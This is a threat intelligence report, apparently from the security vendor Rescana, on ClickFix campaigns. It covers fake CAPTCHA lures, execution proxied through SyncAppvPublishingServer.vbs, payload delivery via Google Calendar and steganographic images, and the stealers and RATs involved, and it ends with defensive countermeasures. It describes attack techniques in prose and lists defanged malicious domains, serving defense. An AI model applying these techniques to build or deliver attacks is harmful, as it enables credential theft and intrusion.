Executive Summary

ClickFix attacks have rapidly evolved into a significant threat vector, leveraging fake CAPTCHAs, Microsoft-signed scripts, and trusted web services to deliver advanced malware payloads, including information stealers and remote access tools. These campaigns are characterized by their abuse of "living-off-the-land" (LotL) techniques, sophisticated social engineering, and the exploitation of legitimate cloud and blockchain services for payload delivery and command-and-control (C2) operations. The attacks primarily target enterprise and education sectors, with a marked increase in incidents affecting organizations in the United States, Europe, and Latin America. The use of trusted system components and cloud services enables these attacks to bypass traditional security controls, making them particularly challenging to detect and mitigate.

Threat Actor Profile

The actors behind ClickFix attacks are a mix of financially motivated cybercriminals and advanced persistent threat (APT) groups. Notably, groups such as DarkHotel (China) and BlueNoroff (North Korea) have been observed employing similar techniques, particularly the abuse of SyncAppvPublishingServer.vbs for stealthy PowerShell execution. Additionally, Microsoft has tracked several threat clusters, including Storm-1607, Storm-0426, Storm-0249, and Storm-1877, which have conducted large-scale phishing and malvertising campaigns utilizing the ClickFix methodology. The proliferation of ClickFix as a Malware-as-a-Service (MaaS) offering on underground forums, with builders available for $200–$1,500 per month, has further democratized access to these advanced attack techniques, enabling a broader range of actors to participate in these campaigns.

Technical Analysis of Malware/TTPs

The ClickFix attack chain is notable for its multi-stage, highly evasive execution flow. Initial access is typically achieved through phishing emails, malvertising, or compromised websites that present the victim with a fake CAPTCHA or verification page. These pages employ JavaScript to copy an obfuscated command to the user's clipboard, instructing them to paste and execute it in the Windows Run dialog or terminal. The command leverages SyncAppvPublishingServer.vbs, a Microsoft-signed App-V script present on Enterprise, Education, and Server editions of Windows, to proxy execution through wscript.exe. This approach bypasses PowerShell execution restrictions and leverages a trusted Windows component, effectively evading endpoint detection and response (EDR) solutions and application whitelisting.

Once executed, the loader performs anti-sandbox checks and retrieves configuration data from a public Google Calendar ICS file, using this trusted third-party service as a dead drop resolver. Subsequent stages are loaded via in-memory PowerShell scripts, which fetch a PNG image from domains such as gcdnb.pbrd[.]co and iili[.]io using WinINet APIs. The image contains an encrypted, compressed PowerShell payload, which is decrypted and executed in memory using Invoke-Expression. The final stage involves a shellcode loader that launches malware such as Amatera Stealer, Lumma Stealer, Xworm, AsyncRAT, or the r77 rootkit.

The C2 infrastructure is highly resilient, utilizing trusted services such as Google Calendar, jsDelivr CDN, and the Binance BNB Smart Chain for configuration and payload delivery. Exfiltration endpoints and infrastructure are rotated frequently, further complicating detection and response efforts. Variants such as JackFix, CrashFix, and GlitchFix employ different lures and delivery methods, while the ErrTraffic Traffic Distribution System (TDS) corrupts web pages and suggests fake fixes to drive user interaction.

Exploitation in the Wild

ClickFix attacks have been observed at scale, with Microsoft reporting that 47% of initial access attacks in the past year utilized this technique. A single ClearFake campaign resulted in over 147,000 infections, demonstrating the effectiveness and reach of these attacks. Notable campaigns include the use of fake browser updates and CAPTCHAs to deliver the Emmenhtal Loader and Lumma Stealer, as well as the Lampion campaign targeting government, finance, and transportation sectors in Portugal and other countries. The Amatera Stealer campaign leveraged Google Calendar and image steganography for payload delivery, while the OBSCURE#BAT campaign delivered the r77 rootkit via Discord-themed ClickFix lures.

The attacks are not limited to Windows environments; recent campaigns have targeted macOS users with Bash-based ClickFix lures delivering the AMOS stealer. The widespread availability of ClickFix builders and the support for multiple file distribution modes via the ErrTraffic TDS have enabled rapid adaptation and expansion of these campaigns across different platforms and geographies.

Victimology and Targeting

The primary targets of ClickFix attacks are organizations operating Microsoft Windows 10/11 Enterprise, Education, and Server editions, as these are the environments where SyncAppvPublishingServer.vbs is present and enabled by default. Sectors most affected include enterprise, education, government, financial services, transportation, and social media creators or monetized pages. Geographically, the United States, Canada, Portugal, Switzerland, Luxembourg, France, Hungary, Mexico, and Germany have seen significant activity.

Social engineering lures are tailored to the target audience, with recent campaigns focusing on social media creators by offering fake verification badges or urgent account updates. The use of fake CAPTCHAs, browser update prompts, system font errors, and video instructions increases the likelihood of user interaction and successful execution of the attack chain.

Mitigation and Countermeasures

Defending against ClickFix attacks requires a multi-layered approach. Organizations should monitor for the execution of SyncAppvPublishingServer.vbs outside of normal App-V operations, particularly when invoked by user action or with suspicious command-line arguments. Security teams should implement alerts for clipboard activity that matches known ClickFix command patterns, such as PowerShell or wscript commands copied from browsers.

Outbound connections to known malicious domains should be blocked, and access to public Google Calendar ICS files from endpoints should be monitored. Browser security should be hardened, and users should be educated about the risks of fake CAPTCHAs, browser update prompts, and unsolicited verification requests. Where possible, restrict the use of App-V and monitor for its unexpected activation on endpoints.

Enable PowerShell script block logging and set execution policies to AllSigned or RemoteSigned. Utilize Microsoft Defender XDR and Office 365 for advanced detection, blocking, and threat hunting, leveraging available hunting queries and detection rules. Group Policy can be used to disable the Run dialog (Win+R) and remove the Run option from the Start Menu if not required.

References

• The Hacker News: ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services

• Microsoft Security Blog: Think before you Click(Fix)

• Kaspersky: What is ClickFix and how to protect your company

• Sekoia.io: ClickFix tactic: Revenge of detection

• Expel: ClearFake Campaign Analysis

• Censys: GlitchFix and the Fake CAPTCHA Ecosystem

• MITRE ATT&CK: System Script Proxy Execution

• HHS Sector Alert: ClickFix Attacks (PDF)

• Bitdefender: ClickFix Social Engineering

• Blackpoint: ClickFix Analysis

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their supply chain and digital ecosystem. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and address emerging threats, ensuring robust protection for critical assets and business operations.

For further details, threat intelligence feeds, or custom detection rules, please contact Rescana at ops@rescana.com.